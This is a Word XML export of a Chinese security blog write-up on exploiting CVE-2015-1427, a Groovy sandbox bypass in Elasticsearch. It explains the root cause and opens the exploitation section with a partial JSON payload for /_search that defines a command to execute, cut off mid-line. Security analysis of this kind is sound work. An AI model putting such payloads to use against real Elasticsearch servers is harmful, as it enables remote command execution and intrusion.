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07" w:rsidRPr="00E86707" w:rsidRDefault="00E86707" w:rsidP="00E86707">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://blog.nsfocus.net/elasticsearch-%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90%ef%bc%88cve-2015-1427%ef%bc%89%e9%ab%98%e7%ba%a7%e5%88%a9%e7%94%a8%e6%96%b9%e6%b3%95/" \l "0x00" \o "0x00 漏洞概述" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="9F9F9F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>0x00 漏洞概述</w:t>
      </w:r>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86707" w:rsidRPr="00E86707" w:rsidRDefault="00E86707" w:rsidP="00E86707">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:anchor="0x01" w:tooltip="0x01 漏洞原理" w:history="1">
        <w:r w:rsidRPr="00E86707">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="9F9F9F"/>
            <w:kern w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>0x01 漏洞原理</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E86707" w:rsidRPr="00E86707" w:rsidRDefault="00E86707" w:rsidP="00E86707">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:anchor="0x02" w:tooltip="0x02 漏洞利用" w:history="1">
        <w:r w:rsidRPr="00E86707">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="9F9F9F"/>
            <w:kern w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>0x02 漏洞利用</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E86707" w:rsidRPr="00E86707" w:rsidRDefault="00E86707" w:rsidP="00E86707">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:anchor="0x03" w:tooltip="0x03 思维壁垒" w:history="1">
        <w:r w:rsidRPr="00E86707">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="9F9F9F"/>
            <w:kern w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>0x03 思维壁垒</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E86707" w:rsidRPr="00E86707" w:rsidRDefault="00E86707" w:rsidP="00E86707">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:anchor="0x04" w:tooltip="0x04 漏洞总结" w:history="1">
        <w:r w:rsidRPr="00E86707">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="9F9F9F"/>
            <w:kern w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>0x04 漏洞总结</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E86707" w:rsidRPr="00E86707" w:rsidRDefault="00E86707" w:rsidP="00E86707">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:anchor="i" w:tooltip="漏洞小结" w:history="1">
        <w:r w:rsidRPr="00E86707">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="9F9F9F"/>
            <w:kern w:val="0"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>漏洞小结</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E86707" w:rsidRPr="00E86707" w:rsidRDefault="00E86707" w:rsidP="00E86707">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:anchor="i-2" w:tooltip="防护方案" w:history="1">
        <w:r w:rsidRPr="00E86707">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="9F9F9F"/>
            <w:kern w:val="0"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>防护方案</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E86707" w:rsidRDefault="00E86707" w:rsidP="00E86707">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>合上一篇文章一起来看 我第一次知道CVE-2015-1427这个漏洞是在2月13日（春节放假前一天），但是当时想着过年，而且觉得应该是Groovy自身的问题，就也没太在意。知道前两</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>天兰</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>少（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>lupin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）问我有没有看这个漏洞，说他找到了绕过</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>了沙盒的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法，才跑去看。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86707" w:rsidRDefault="00E86707" w:rsidP="00E86707">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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我跟</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>lupin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>玩这个洞的思路不太一样，而且漏洞原理在他的文章里已经说的很清楚了，我这篇文章主要侧重这个漏洞利用的各种玩法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86707" w:rsidRDefault="00E86707" w:rsidP="00E86707">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="666666"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ez-toc-section"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="4C4C4C"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>0x01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="4C4C4C"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="004738"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86707" w:rsidRDefault="00E86707" w:rsidP="00E86707">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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漏洞原因很简单，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>由于沙盒代码</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>黑名单中的Java危险方法不全，从而导致恶意用户仍可以使用反射的方法来执行Java代码。这就完了？当然不是！由于</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Elasticsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>开发团队没有完全认知Groovy的强大，以为仅仅防止用户调用Java反射就可以免于被攻击，这真是太好笑了，我们来看下Groovy对自己的描述：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86707" w:rsidRDefault="00E86707" w:rsidP="00E86707">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://blog.nsfocus.net/wp-content/uploads/2015/04/groovy1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="666666"/>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groovy" style="width:24pt;height:24pt"/>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86707" w:rsidRDefault="00E86707" w:rsidP="00E86707">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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没错！Groovy是一款开发语言，这意味着我们完全可以在不使用Java的前提下实现代码执行。如果仅仅</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>是沙盒的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>问题，那么修补黑白名单到攻击者没办法绕过</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>沙盒使用</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java反射就好了，但是一种语言要怎么靠黑白名单来限制它的绝大部分功能？所以没有把Groovy</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>当做</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>一种编程语言是这问题的真正原因。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86707" w:rsidRDefault="00E86707" w:rsidP="00E86707">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="666666"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ez-toc-section"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="4C4C4C"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>0x02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="4C4C4C"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="004738"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86707" w:rsidRDefault="00E86707" w:rsidP="00E86707">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="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漏洞利用其实也很简单，我们只需要参照官方提供的script使用说明来执行脚本就可以了。</w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:color w:val="4C4C4C"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>官方文档</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>提供了两个方法让我们直接执行脚本代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86707" w:rsidRDefault="00E86707" w:rsidP="00E86707">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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我们先来看第一种方式——直接执行脚本，这种方式也就是目前大家都在使用的方式。使用起来也很简单，直接向/_search这个URL提供如下POST内容：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A5775" w:rsidRPr="00E86707" w:rsidRDefault="00E86707" w:rsidP="00E86707">
      <w:pPr>
        <w:ind w:firstLineChars="500" w:firstLine="750"/>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>script_fields</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>": {"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>my_field</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>": {"script": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> command=\"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:sz w:val="15"/>
